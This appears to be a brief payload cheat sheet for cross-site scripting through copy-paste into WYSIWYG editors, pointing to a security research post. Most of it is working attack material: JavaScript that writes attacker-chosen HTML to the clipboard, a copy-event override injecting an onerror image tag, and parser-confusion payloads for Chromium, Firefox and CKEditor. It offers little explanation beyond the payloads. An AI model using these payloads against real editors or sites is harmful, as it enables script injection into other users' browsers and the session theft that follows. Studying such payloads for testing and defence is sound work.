WYSIWYG XSS Payloads

Post

https://research.securitum.com/the-curious-case-of-copy-paste/

Clipboard Code

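<button id="copyButton">Copy Me</button>
<script>
// On click, write one clipboard item that carries both a text/plain and a text/html flavor.
// navigator.clipboard.write() requires a secure context (HTTPS or localhost); the click supplies the user gesture.
document.getElementById('copyButton').addEventListener('click', async () => {
  const textToCopy = '';              // text/plain flavor, left empty
  const htmlToCopy = `YOUR RAW CODE`; // placeholder: the markup to place in the text/html flavor

  try {
    await navigator.clipboard.write([
      new ClipboardItem({
        'text/plain': new Blob([textToCopy], { type: 'text/plain' }),
        'text/html': new Blob([htmlToCopy], { type: 'text/html' })
      })
    ]);
    console.log('성공'); // "success"
  } catch (err) {
    console.error('실패', err); // "failure"
  }
});
</script>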

Payloads

Clipboard basic

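// Override the page's copy event so the text/html flavor is set by script instead of by the selection.
document.oncopy = event => {
  event.preventDefault();
  event.clipboardData.setData('text/html', '<img src onerror=alert(1)>');
};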

Chromium

(start)
a<math>b<xss style=display:block>c<style>d<a title="</style><img src onerror=alert(1)>">e
(end)

Copy me => (start) ab<xss style=display:block;>c

Firefox

(start)
<style>
@import''; 
@font-face { font-family: 'ab<\/style><img src onerror=alert(1)>'}
</style>
(end)

Copy me => (start)

(end)

CKEditor

(start)
A<!--{ce_protected}{C}%3C!%2D%2D%20comment%20%2D%2D%3E-->B
(end)

Copy me => (start) AB (end)